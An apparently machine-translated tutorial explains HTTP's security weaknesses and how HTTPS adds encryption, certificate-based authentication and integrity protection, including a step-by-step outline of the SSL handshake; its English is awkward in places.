One, the disadvantages of HTTP
Prior to the introduction of some of the HTTP protocol related knowledge, HTTP is very good and convenient, but it also has shortcomings, the main deficiencies in the following aspects:
Communication using plaintext (not encrypted), content may be bugged
does not verify the identity of the communicating party and therefore may encounter spoofing
Cannot prove the integrity of the message, so it may have been tampered with
Other unencrypted protocols also exist for this kind of problem
Security vulnerabilities exist for certain Web servers and specific Web browsers
1. Communication using plaintext may be tapped
HTTP itself does not have encryption capability to encrypt the entire communication (request and response content that uses HTTP protocol communication), i.e. HTTP messages are transmitted using plaintext (unencrypted messages)
Communication mechanism of TCP/IP protocol family: Communication content may be peered on all communication lines
Countermeasures : Encrypt communications to prevent eavesdropping
Encrypted objects:
①. Encryption of communications
The HTTP protocol has no encryption mechanism and can be used in combination with SSL (Secure Socket Layer) or TLS (Transport Layer Security: Secure Layer transport Protocol) to encrypt the HTTP communication content. This is often said HTTPS (Hypertext Transport Security Protocol)
②. Encryption of content
The HTTP protocol does not have an encryption mechanism to encrypt the contents of the transmission itself, that is, the body of the message, the client encrypts the request message after the transfer, but only if the client and server have encryption and decryption mechanism, which is mainly applied to the Web service (but still has the risk of being tampered with)
2, do not verify the identity of the communication party, may encounter camouflage
The request and response in the HTTP protocol does not acknowledge the communication party, that is, whether the server is a host that is truly specified by the URI of the sending request. Returns whether the response is actually returned to the actual requesting client "such as a similar issue
Anyone can initiate a request, and the server will return a response whenever the request is received (only if the sending side IP and port number are not restricted by the Web server setting)
The vulnerability of the HTTP protocol has the following points:
①. Unable to determine whether the Web server that sent the request to the destination is a server that returns a response in real-world intention, possibly a spoofed server
②. It is not possible to determine whether the client returned by the response is the client that received the response in the true intent, possibly a spoofed client
③. Unable to determine whether the other person communicating has access, because some Web servers hold important information, only the permissions that are communicated to specific users
④. Cannot tell where the request came from
⑤. Even when meaningless requests are received, d0s attacks under massive requests cannot be blocked (denial of service: Denial of services attacks)
3. Unable to prove message integrity, may have been tampered with
Completeness: Refers to the accuracy of information, if it cannot prove its integrity, it means that the information is not correct
The HTTP protocol is unable to prove the message integrity of the communication, so the request or response is not known if it is tampered with during transmission, such as in a request or response transmission in which an attacker intercepts a tamper attack called a man-in-the-middle attack (Man-in-the-middle Attack,mitm)
Prevention of tampering: common methods include MD5 and SHA-1 hash value verification methods, and to confirm the file's digital signature method
Second, http+ encryption + authentication + integrity Protection =https
1, usually add encryption and authentication mechanism of the HTTP protocol called HTTPS (HTTP Secure), the certificate can prove the identity of the server or the client
2, HTTPS equivalent to the SSL shell of the HTTP
HTTPS is not a new protocol for the application layer, but instead of the SSL (Secure Socket Layer) and TLS (Transport Layer Security: Secure Layer Transport Protocol) protocol in the HTTP Communication Interface Section
Typically, HTTP and TCP communicate directly, and when SSL is used, it is communicated by HTTP and SSL, and then by SSL and TCP
SSL is an HTTP-independent protocol that can be used with SSL for other application-level protocols such as SMTP and Telnet
3. Encryption technology
SSL uses public key encryption (Public-key cryptography) encryption method, encryption algorithm is public, but the key is confidential, to maintain the security of the encryption method (the key used to decrypt the encrypted content)
The way to encrypt and decrypt a common key is called Shared key encryption (Common key crypto system), also known as symmetric key encryption
Public Key Encryption Method:
Public key encryption uses a pair of asymmetric keys, one called private key, and one is called Public key
Process: The party that sends the ciphertext uses the secret key of the other party to encrypt, the other party receives the encrypted information, uses its own private key to decrypt (in order to decrypt according to ciphertext and public key, theoretically can, but actually operation, very difficult)
HTTPS uses a hybrid encryption mechanism
HTTPS uses a hybrid encryption mechanism with both shared key encryption and public key encryption. If the key is safe to exchange, it may only be encrypted with public key (public key encryption is slower than shared key encryption)
The advantages of the two encryption mechanisms should be used rationally in the practical application, and the communication should be combined (exchanging key link using public key encryption method, establishing the communication Exchange message phase using shared encryption mechanism)
4. Certificate
Public key certificates issued by the Digital Certification authority (ca:certificate authority) and other relevant authorities
In the client and server can be trusted by the third-party agency position, the server through the application of public key digital signature, assign the public key, its and the key certificate binding, and then the server to the client for public key encryption mode of communication;
The client receiving the certificate uses the public key of the digital certificate Authority, authenticates the digital signature of the server certificate, and then clarifies 2 points:
①. The public key of the authentication server is a true and effective digital certificate certification authority
②. The public key of the server refers to the trusted
Role:
①. Prove the server specification of the communication party
②. Verify that the enterprise behind the other server is real (the certificate that owns the feature is the EV SSL Certificate: Extended Validation SSL cetificate); Features: The browser background color is green
5. HTTPS Secure communication mechanism
HTTPS Communication process:
①. Clients send client Hello messages to begin communication, including SSL-specified versions, cryptographic components, lists, etc. supported by the client
②. When the server receives the request message, it contains the SSL version in the response message and the encryption component sends the server Hello (the contents of the cryptographic component are filtered from the received client encryption component)
The server then sends the certificate message, which contains the public key certificate
The last server sends the server Hello done message to notify the client that the initial phase of the SSL Handshake negotiation Section ends
③. The first handshake ends, client Key Exchange message response, the message contains a random cipher string called Pre-master Sercet used in communication encryption (the message has been encrypted using the public key of the previous step)
Then the client you continue to send the change Cipher spec message, the message prompts the server, the communication after this message using Pre-master Sercet key encryption
The last client sends a finished message that contains the overall checksum value of all the messages that have been connected to the present (this time the handshake succeeds and the server can correctly decrypt the message as the standard)
④. The server also sends the change Cipher spec message
The server also sends finisher messages
⑤. After the server and client finished message exchange is complete, the SSL connection is completed and the communication receives SSL protection.
⑥. The application-layer protocol begins the communication, which is the HTTP request
⑦. Finally disconnected by the client, sending a close_notify message when disconnecting, and then sending a TCP fin message to close the communication with TCP
In the above communication process, the application layer sends the data with the MAC (message authentication Code) message digest, Mac can query the message is tampered with, protect the message integrity
Communication Flowchart (The process by which the server exposes a key certificate to establish HTTPS)
HTTPS uses both protocols such as SSL (Secure Socket Layer) and TLS (Transport Layer Security: Secure Layer Transport Protocol)
: processing speed is slow when using SSL
①. Slow communication: communication time consumes CPU and memory resources, compared to HTTP, the network load may be 2-100 times slower (traffic increase)
②. Encryption processing: Both the server and the client are encrypted and decrypted, consuming more server and client hardware resources, resulting in increased load
Improvement Scenario: Use SSL accelerator (dedicated server) for SSL communication dedicated hardware, can increase the number of times SSL compute your speed, only in the SSL communication processing to play a role in order to share the load
HTTP protocol (11) HTTP vs. https